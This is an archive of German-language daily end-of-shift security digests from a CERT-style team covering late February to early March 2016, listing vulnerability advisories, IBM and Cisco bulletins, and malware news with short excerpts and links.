http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco FireSIGHT System Software Convert Timing Channel Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco FireSIGHT System Software Device Management UI Cross-Site Scripting Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Privileged Identity Manager Virtual Appliance (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21978009 --------------------------------------------- *** IBM Security Bulletin: Lotus Protector for Mail affected by glibc, getaddrinfo stack-based buffer overflow (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977368 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Marketing Platform, IBM Campaign, IBM Predictive Insight, IBM Contact Optimization, IBM Marketing Operations (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976886 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM Tivoli Storage Manager Fastback for Workstations (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974685 --------------------------------------------- *** Security Bulletin: Vulnerabilities in OpenSSL and MD5 Signature and Hash Algorithm (CVE-2015-7575) affect IBM System Networking RackSwitch products. *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099210 --------------------------------------------- *** Security Bulletin: Multiple vulnerabilities, including MD5 Signature and Hash Algorithm (CVE-2015-7575), affect IBM Flex System Networking Switches *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099200 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in libpng affect IBM Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540) *** http://www.ibm.com/support/docview.wss?uid=swg21976924 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Client Application Access (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977618 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 1-03-2016
by Daily end-of-shift report 01 Mar '16

01 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 29-02-2016 18:00 − Dienstag 01-03-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Bleichenbacher-Angriff: Drown entschlüsselt mit uraltem SSL-Protokoll *** --------------------------------------------- Kein moderner Browser unterstützt das alte SSL-Protokoll Version 2. Trotzdem kann es zum Sicherheitsrisiko werden, solange Server es aus Kompatibilitätsgründen unterstützen. Es muss nicht einmal derselbe Server sein. --------------------------------------------- http://www.golem.de/news/bleichenbacher-angriff-drown-entschluesselt-mit-ur… *** The Definitive Guide on Win32 to NT Path Conversion *** --------------------------------------------- Posted by James Forshaw, path'ological reverse engineer. How the Win32 APIs process file paths on Windows NT is a tale filled with backwards compatibility hacks, weird behaviour, and beauty. Incorrect handling of Win32 paths can lead to security vulnerabilities. This blog post is to try and give a definitive* guide on the different types of paths supported by the OS. I'm going to try and avoid discussion of quirks in the underlying filesystem implementations (such as NTFS... --------------------------------------------- http://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32… *** De-obfuscating malicious Vbscripts *** --------------------------------------------- With the returned popularity of visual basic as a first attack vector in mind, we took a look at de-obfuscating a few recent vbs files starting with a very easy one and progressing to a lot more complex script.Categories: Malware AnalysisTags: bankerclickerde-obfuscatedecryptdroppermalwareobfuscationPieter Arntztrojanvbsvbscriptworm(Read more...) --------------------------------------------- https://blog.malwarebytes.org/intelligence/2016/02/de-obfuscating-malicious… *** Look Into Locky *** --------------------------------------------- Some sources say that Locky is the latest ransomware created and released in the wild by Dridex gang. Our studies indicate that it is well prepared, which means that the threat actor/s behind it has invested for it.Categories: Malware AnalysisTags: Lockyransomware(Read more...) --------------------------------------------- https://blog.malwarebytes.org/intelligence/2016/03/look-into-locky/ *** OpenSSL Security Advisories *** --------------------------------------------- CVE-2016-0800 (OpenSSL advisory) [High severity] CVE-2016-0705 (OpenSSL advisory) [Low severity] CVE-2016-0798 (OpenSSL advisory) [Low severity] CVE-2016-0797 (OpenSSL advisory) [Low severity] CVE-2016-0799 (OpenSSL advisory) [Low severity] CVE-2016-0702 (OpenSSL advisory) [Low severity] CVE-2016-0703 (OpenSSL advisory) [High severity] CVE-2016-0704 (OpenSSL advisory) [Moderate severity] --------------------------------------------- https://openssl.org/news/vulnerabilities.html *** VU#938151: Forwarding Loop Attacks in Content Delivery Networks may result in denial of service *** --------------------------------------------- Vulnerability Note VU#938151 Forwarding Loop Attacks in Content Delivery Networks may result in denial of service Original Release date: 29 Feb 2016 | Last revised: 29 Feb 2016 Overview Content Delivery Networks (CDNs) may in some scenarios be manipulated into a forwarding loop, which consumes server resources and causes a denial of service (DoS) on the network. Description CWE-400: Uncontrolled Resource Consumption (Resource Exhaustion)Content Delivery Networks (CDNs) are used to improve... --------------------------------------------- http://www.kb.cert.org/vuls/id/938151 *** F5 Security Advisory: Multiple NTP vulnerabilities CVE-2015-8139 and CVE-2015-8140 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/00/sol00329831.html?… *** Bugtraq: [security bulletin] HPSBUX03552 SSRT102983 rev.1 - HP-UX BIND running Named, Remote Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537659 *** DFN-CERT-2016-0355: phpMyAdmin: Mehrere Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0355/ *** Bugtraq: [SYSS-2016-009] Sophos UTM 525 Web Application Firewall - Cross-Site Scripting in *** --------------------------------------------- http://www.securityfocus.com/archive/1/537662 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of Tivoli Network Manager IP Edition (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974785 --------------------------------------------- *** IBM Security Bulletin: Multiple Security Vulnerabilities in Apache Tomcat affect IBM RLKS Administration and Reporting Tool *** http://www.ibm.com/support/docview.wss?uid=swg21976103 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977374 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977372 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affect IBM Tivoli Access Manager for e-business and IBM Security Access Manager for Web 7.0 software (CVE-2016-0603) *** http://www.ibm.com/support/docview.wss?uid=swg21978024 --------------------------------------------- *** IBM Security Bulletin: Cross-Site scripting vulnerability in IBM Business Process Manager document list control (CVE-2016-0227) *** http://www.ibm.com/support/docview.wss?uid=swg21978058 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM OS Images for Red Hat Linux Systems, AIX, and Windows. (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977880 --------------------------------------------- *** IBM Security Bulletin:A vulnerability in IBM Java SDK affects IBM Image Construction and Composition Tool. (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977647 --------------------------------------------- *** IBM Security Bulletin:A vulnerability in IBM Java SDK affects IBM Workload Deployer. (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977646 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM SmartCloud Entry (CVE-2016-0475 CVE-2016-0448 CVE-2015-7575 CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023408 --------------------------------------------- *** Security Bulletin: Vulnerability in IBM Java SDK affects IBM System Networking Switch Center (CVE-2015-7575) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099203 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM PureApplication System. (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21978026 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Mobile *** http://www.ibm.com/support/docview.wss?uid=swg21976765 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Web and IBM Tivoli Access Manager for e-business *** http://www.ibm.com/support/docview.wss?uid=swg21976678 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects Rational Software Architect, Software Architect for WebSphere Software & Rational Software Architect RealTime *** http://www.ibm.com/support/docview.wss?uid=swg21976894 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in Apache ActiveMQ affects IBM Tivoli System Automation Application Manager (CVE-2015-5254) *** http://www.ibm.com/support/docview.wss?uid=swg21977546 ---------------------------------------------

1 0

Tageszusammenfassung - Montag 29-02-2016
by Daily end-of-shift report 29 Feb '16

29 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 26-02-2016 18:00 − Montag 29-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Fixing the Internets routing security is urgent and requires collaboration *** --------------------------------------------- The Internet is fragile. Many of its protocols were designed at a time when the goal was rapid network expansion based on trust among operators. Today, the Internets open nature is what makes it so great for business, education and communication, but the absence of security mechanisms at its core is something that criminals are eager to exploit.In late January, traffic to many IP (Internet Protocol) addresses of the U.S. Marine Corps was temporarily diverted through an ISP in Venezuela. --------------------------------------------- http://www.cio.com/article/3038752/fixing-the-internets-routing-security-is… *** Angler Exploit Kit Learns New Tricks, Finds Home On Popular Website *** --------------------------------------------- Angler Exploit evaded detection through new technique that bypasses Firefox and Chrome security protection. --------------------------------------------- http://threatpost.com/angler-exploit-kit-learns-new-tricks-finds-home-on-po… *** HackingTeam Reborn; A Brief Analysis of an RCS Implant Installer *** --------------------------------------------- As Im generally quite occupied with my day job as Director of R&D at Synack, the weekend is when I finally have some free time to blog. This weekend I wasnt sure what Id write about until @osxreverser tweeted late Friday afternoon:... --------------------------------------------- https://objective-see.com/blog/blog_0x0D.html *** The rise of polymorphic malware *** --------------------------------------------- 97% of malware is unique to a specific endpoint, rendering signature-based security virtually useless. The data collected by Webroot throughout 2015 shows that today's threats are truly global and highly dynamic. Many attacks are staged, delivered, and terminated within a matter of hours, or even minutes, having harvested user credentials and other sensitive information. Countering these threats requires an innovative approach to attack detection that leverages advanced techniques and... --------------------------------------------- https://www.helpnetsecurity.com/2016/02/29/the-rise-of-polymorphic-malware/ *** ATMZombie: banking trojan in Israeli waters *** --------------------------------------------- On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. The incident Israeli banks experienced had a very fascinating and innovative method of stealing the money. --------------------------------------------- http://securelist.com/blog/research/73866/atmzombie-banking-trojan-in-israe… *** Increasing the resilience of Europe's telecommunication infrastructures through Incident Reporting *** --------------------------------------------- A recent ENISA report analyses how mandatory incident reporting schemes have improved resilience and security in the EU telecoms sector. Experiences from this scheme can also serve as a model for the implementation of the forthcoming NIS Directive in other sectors. --------------------------------------------- https://www.enisa.europa.eu/media/press-releases/increasing-the-resilience-… *** Security: 85 Prozent der SSL-VPNs haben unsichere Konfigurationen *** --------------------------------------------- Zahlreiche SSL-VPNs sichern den Traffic der Nutzer nur unzureichend ab - das behauptet eine Sicherheitsfirma. Viele Anbieter würden nach wie vor SHA-1 oder MD5 verwenden. Außerdem seien rund 10 Prozent der Dienste für Heartbleed anfällig. --------------------------------------------- http://www.golem.de/news/security-85-prozent-der-ssl-vpns-haben-unsichere-k… *** Klickbetrug: Trojaner-Familie infiltriert immer wieder Google Play *** --------------------------------------------- Android-Nutzer müssen sich derzeit vor kostenlosen Apps in Acht nehmen, die sich als beliebte Spiele ausgeben. Dahinter verbergen sich Klickbetrugs-Apps, mit denen Gauner Kasse machen. --------------------------------------------- http://heise.de/-3120091 *** Cyber-Attack Against Ukrainian Critical Infrastructure *** --------------------------------------------- On December 23, 2015, Ukrainian power companies experienced unscheduled power outages impacting a large number of customers in Ukraine. This report provides an account of the events that took place based on interviews with company personnel. --------------------------------------------- https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01 *** OpenSSL CVE-2016-0799: heap corruption via BIO_printf *** --------------------------------------------- There are a couple of issues with OpenSSL's BIO_*printf() functions, defined in crypto/bio/b_print.c, that are set to be fixed in the forthcoming security release. The function that is primarily responsible for interpreting the format string and transforming this string and the functions arguments to a string is _dopr(). --------------------------------------------- https://guidovranken.wordpress.com/2016/02/27/openssl-cve-2016-0799-heap-co… *** VU#419128: IKE/IKEv2 protocol implementations may allow network amplification attacks *** --------------------------------------------- Vulnerability Note VU#419128 IKE/IKEv2 protocol implementations may allow network amplification attacks Original Release date: 29 Feb 2016 | Last revised: 29 Feb 2016 Overview Implementations of the IKEv2 protocol are vulnerable to network amplification attacks. Description CWE-406: Insufficient Control of Network Message Volume (Network Amplification)IKE/IKEv2 and other UDP-based protocols can be used to amplify denial-of-service attacks. In some scenarios, an amplification of up to 900%... --------------------------------------------- http://www.kb.cert.org/vuls/id/419128 *** F5 Security Advisory: libpng out-of-bounds read vulnerability CVE-2015-7981 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/21/sol21057235.html?… *** APPLE-SA-2016-02-25-1 Apple TV 7.2.1 *** --------------------------------------------- APPLE-SA-2016-02-25-1 Apple TV 7.2.1Apple TV 7.2.1 is now available and addresses the following:bootpAvailable for: Apple TV (3rd Generation)Impact: A malicious Wi-Fi network may be able to determine networksa device has previously accessedDescription: Upon connecting to a Wi-Fi network, iOS may havebroadcast MAC addresses of previously accessed networks via the DNAv4protocol. This issue was addressed through disabling DNAv4 onunencrypted Wi-Fi networks.CVE-IDCVE-2015-3778 : Piers... --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Feb/msg00000.ht… *** Access Governance Suite 6.0-6.4 *** --------------------------------------------- Abstract: README for HTML Fragment Privilege Escalation Vulnerability E-Fix E-Fix Deliverable: AGS-SV-eFix022416.zipDocument ID: 5236850Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:AGS-SV-eFix022416.zip (3.83 kB)AGS-SV-eFix022416-CHECKSUM.txt (99 bytes)Products:Access Governance 6.4Access Governance 6.1Access Governance 6.2Access Governance 6.3Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=Tft9udlb11s~ *** D-Link / Netgear FIRMADYNE Command Injection / Buffer Overflow *** --------------------------------------------- Topic: D-Link / Netgear FIRMADYNE Command Injection / Buffer Overflow Risk: High Text:Hello, We’d like to report several vulnerabilities in embedded devices developed by D-Link and Netgear, which were discove... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020224 *** Bugtraq: [security bulletin] HPSBGN03549 rev.1 - HP IceWall Products using glibc, Remote Denial of Service (DoS), Arbitrary Code Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/537637 *** Cisco Videoscape Distribution Suite for Internet Streaming TCP Session Handling Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Citrix Security Advisory for glibc Vulnerability CVE-2015-7547 *** --------------------------------------------- A vulnerability has been recently disclosed in the glibc getaddrinfo() function. This issue could potentially allow an attacker to inject code into a process that calls the vulnerable function. The issue has been assigned the following CVE identifier:... --------------------------------------------- https://support.citrix.com/article/CTX206991 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM WebSphere MQ Internet Pass-Thru (CVE-2015-7575) *** 2016-02-26T13:23:47-05:00 http://www.ibm.com/support/docview.wss?uid=swg21977517 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects Rational Functional Tester (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976947 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere BigInsights (Applicable CVEs: CVE-2015-7575, CVE-2016-0448, CVE-2016-0466, CVE-2016-0475) *** http://www.ibm.com/support/docview.wss?uid=swg21976080 --------------------------------------------- *** IBM Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2016-0262) *** http://www.ibm.com/support/docview.wss?uid=swg21977828 --------------------------------------------- *** IBM Security Bulletin: Current releases of the IBM SDK, Java Technology Edition are affected by CVE-2016-0603 *** http://www.ibm.com/support/docview.wss?uid=swg21977549 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Cordova affects IBM MobileFirst Platform Foundation (CVE-2015-8320) *** http://www.ibm.com/support/docview.wss?uid=swg2C1000091 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21976366 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere eXtreme Scale (CVE-2016-0475, CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21976442 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime Version 6 affects IBM Cognos Business Viewpoint (CVE-2015-7575 ) *** http://www.ibm.com/support/docview.wss?uid=swg21977407 --------------------------------------------- *** IBM Security Bulletin: IBM Maximo Asset Management could allow an authenticated user to view work logs during purchase orders that they should not have access to (CVE-2016-0222) *** http://www.ibm.com/support/docview.wss?uid=swg21976949 --------------------------------------------- *** Security Bulletin: Vulnerabilities in OpenSSL affect IBM BladeCenter Switches (CVE-2015-3194, CVE-2015-3195) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099199 --------------------------------------------- *** IBM Security Bulletin: Insecure Transmission Vulnerability with IBM InfoSphere Information Server (CVE-2015-7490) *** http://www.ibm.com/support/docview.wss?uid=swg21975827 --------------------------------------------- *** IBM Security Bulletin: libpng related security vulnerabilities identified in IBM Expeditor (CVE-2015-7981, CVE-2015-8126, CVE-2015-8540, CVE-2015-8472) *** http://www.ibm.com/support/docview.wss?uid=swg21975904 --------------------------------------------- *** IBM Security Bulletin: Sensitive data lingers in memory on the WebSphere DataPower XC10 Appliance *** http://www.ibm.com/support/docview.wss?uid=swg21971658 --------------------------------------------- *** IBM Security Bulletin: Sensitive data lingers in memory on the WebSphere eXtreme Scale server *** http://www.ibm.com/support/docview.wss?uid=swg21971657 --------------------------------------------- *** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance denial of service vulnerability (CVE-2015-5286) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021122 --------------------------------------------- *** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance security vulnerability (CVE-2015-5251) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021121 --------------------------------------------- *** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Nova denial of service vulnerability (CVE-2015-3280) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021120 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 26-02-2016
by Daily end-of-shift report 26 Feb '16

26 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 25-02-2016 18:00 − Freitag 26-02-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** VU#444472: QNAP Signage Station and iArtist Lite contain multiple vulnerabilities *** --------------------------------------------- CVE-2015-6022An authenticated attacker without administrative permissions may upload a malicious file, such as a PHP script, --------------------------------------------- http://www.kb.cert.org/vuls/id/444472 *** DSA-3492 gajim - security update *** --------------------------------------------- Daniel Gultsch discovered a vulnerability in Gajim, an XMPP/jabberclient. Gajim didnt verify the origin of roster update, allowing anattacker to spoof them and potentially allowing her to intercept messages. --------------------------------------------- https://www.debian.org/security/2016/dsa-3492 *** Open Web Analytics 1.5.7 Cross Site Scripting *** --------------------------------------------- Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by hitting the ALT+SHIFT+X key after the payload is injected. --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020217 *** Bugtraq: Zimbra Cross-Site Scripting vulnerabilities *** --------------------------------------------- Recently Zimbra Collaboration 8.6 Patch 5 was released. It fixed two Cross-Site Scripting vulnerabilities discovered by Fortinet's FortiGuard Labs. --------------------------------------------- http://www.securityfocus.com/archive/1/537627 *** Sicherheitsupdate für ältere Apple-TV-Geräte *** --------------------------------------------- Apple hat am Donnerstagabend das Betriebssystem älterer Multimediaboxen aktualisiert. Das Update bringt zahlreiche Security-Fixes. --------------------------------------------- http://heise.de/-3118206 *** Quick Audit of *NIX Systems, (Fri, Feb 26th) *** --------------------------------------------- If you think that only computers running Microsoft Windows are targeted by attackers, youre wrong! UNIX (used here as a generic term, not focusing on a specific distribution or brand) is a key operating system on the Internet. Many websites and other public services are relying on it (Netcraftis compiling interesting stats on this topic). Therefore it is mandatory to keep an eye on your servers by using proactive and reactive controls. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20771&rss *** Apache Xerces-C Buffer Overflow Lets Remote Users Deny Service or Potentially Execute Arbitrary Code *** --------------------------------------------- A vulnerability was reported in Apache Xerces-C. A remote user can execute arbitrary code on the target system. A remote user can send specially crafted documents to trigger a buffer overflow in the XML parser library and cause the target application to crash or potentially execute arbitrary code on the target system. --------------------------------------------- http://www.securitytracker.com/id/1035113 *** Krypto-Trojaner Locky: Batch-Dateien infizieren Windows, Tool verspricht Schutz *** --------------------------------------------- Batch-Dateien sind der neueste Schrei, wenn es darum geht, den Krypto-Trojaner Locky am Virenscanner vorbei zu schleusen - und der Plan geht auf. Auf der Suche nach Schutzmaßnahmen haben wir ein Tool ausprobiert, das Locky und Co. stoppen soll. --------------------------------------------- http://heise.de/-3118188 *** Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities *** --------------------------------------------- Infor CRM suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST/PUT parameters in JSON format is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020219 *** Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792) *** --------------------------------------------- The following new pre-authentication exploit against Jenkins (CVE-2016-0792) works because Groovy is on the classpath. There are probably a million other apps that use XStream and have Groovy on the classpath. I put almost no effort into trying to find this vulnerable pattern in other open source applications -- this Jenkins CVE is just one of many. --------------------------------------------- https://www.contrastsecurity.com/security-influencers/serialization-must-di… *** IKE/IKEv2: Ripe for DDoS Abuse *** --------------------------------------------- This is my latest research into preemptive DDoS trends. This time I looked into IKEv2 and what potential it has in regards to DDoS abuse use cases and amplification measurements. The short answer is, it could be easily weaponized for DDoS campaigns. --------------------------------------------- https://www.reddit.com/r/netsec/comments/47l3zv/ikeikev2_ripe_for_ddos_abus… *** IBM Security Bulletins*** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Spectrum Control (formerly Tivoli Storage Productivity Center) CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794 *** http://www.ibm.com/support/docview.wss?uid=swg21977355 --------------------------------------------- *** IBM Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affects IBM Control Center (CVE-2015-4872, CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977686 --------------------------------------------- *** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance information disclosure vulnerability (CVE-2015-5163) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021118 --------------------------------------------- *** Security Bulletin: Vulnerabilities in glibc affect IBM Integrated Management Module II (IMM2) for System x, BladeCenter and Flex Systems (CVE-2015-1472, CVE-2013-7423, CVE-2014-7817, CVE-2014-9402) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099198 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM QRadar SIEM and Incident Forensics (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977665 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM SDK Java Technology Edition affects IBM Development Package for Apache Spark (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977538 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM B2B Advanced Communications (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976813 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM QRadar SIEM and Incident Forensics. (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977664 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in IBM Java Runtime affect Watson Explorer, Watson Content Analytics, and OmniFind Enterprise Edition (CVE-2015-7575, CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21976276 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Control Center (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21977575 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Initiate Master Data Service (CVE-2015-4872, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21976545 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security AppScan Enterprise (CVE-2016-0466, CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976553 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affect Rational Policy Tester (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976733 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005673 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023364 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Tivoli Endpoint Manager for Remote Control. *** http://www.ibm.com/support/docview.wss?uid=swg21976855 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Business Developer (CVE-2015-7575, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21976768 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Developer for i, Rational Developer for AIX and Linux, Rational Developer for Power Systems Software *** http://www.ibm.com/support/docview.wss?uid=swg21976840 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Cast Iron (CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21977301 --------------------------------------------- *** IBM Security Bulletin: A security vulnerability has been identified in IBM Business Process Manager and IBM HTTP Server shipped with IBM Cloud Orchestrator (CVE-2015-1932, CVE-2015-4938) *** http://www.ibm.com/support/docview.wss?uid=swg2C1000043 ---------------------------------------------

1 0

Tageszusammenfassung - Donnerstag 25-02-2016
by Daily end-of-shift report 25 Feb '16

25 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 24-02-2016 18:00 − Donnerstag 25-02-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** Neue Virenwelle: Krypto-Trojaner Locky tarnt sich als Fax *** --------------------------------------------- Der gefährliche Erpressungs-Trojaner wird seit kurzem über Mails verbreitet, die vorgeben, dass der Empfänger ein Fax erhalten hat. Die Virenscanner können mit der aktuellen Locky-Fassung noch nicht viel anfangen. --------------------------------------------- http://heise.de/-3117249 *** Eavesdropping by the Foscam Security Camera *** --------------------------------------------- Brian Krebs has a really weird story about the build-in eavesdropping by the Chinese-made Foscam security camera: Imagine buying an internet-enabled surveillance camera, network attached storage device, or home automation gizmo, only to find that it secretly and constantly phones home to a vast peer-to-peer (P2P) network run by the Chinese manufacturer of the hardware. --------------------------------------------- https://www.schneier.com/blog/archives/2016/02/eavesdropping_b_1.html *** Behind the Malware - Botnet Analysis *** --------------------------------------------- While analyzing our website firewall logs we discovered an old vulnerability in the RevSlider plugin being retargeted. RevSlider, the plugin whose vulnerability led to massive website compromises in 2015, was being leveraged again in an attempt to infect websites over a year since its initial disclosure. The original hack required sending an AJAX request containing the action revslider_ajax_action to ... --------------------------------------------- https://blog.sucuri.net/2016/02/behind-the-malware-botnet-analysis.html *** Cisco FirePOWER Management Center Unauthenticated Information Disclosure Vulnerability *** --------------------------------------------- A vulnerability in the Cisco FirePOWER Management Center could allow an unauthenticated, remote attacker to obtain information about the Cisco FirePOWER Management Center software version from the device login page. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Drupal Core - Critical - Multiple Vulnerabilities - SA-CORE-2016-001 *** --------------------------------------------- Advisory ID: SA-CORE-2016-001 Project: Drupal core Version: 6.x, 7.x, 8.x Date: 2016-February-24 Security risk: 15/25 ( Critical) AC:Basic/A:User/CI:Some/II:Some/E:Proof/TD:All Vulnerability: Multiple vulnerabilities --------------------------------------------- https://www.drupal.org/SA-CORE-2016-001 *** OpenSSL kündigt Patches für Sicherheitslücken 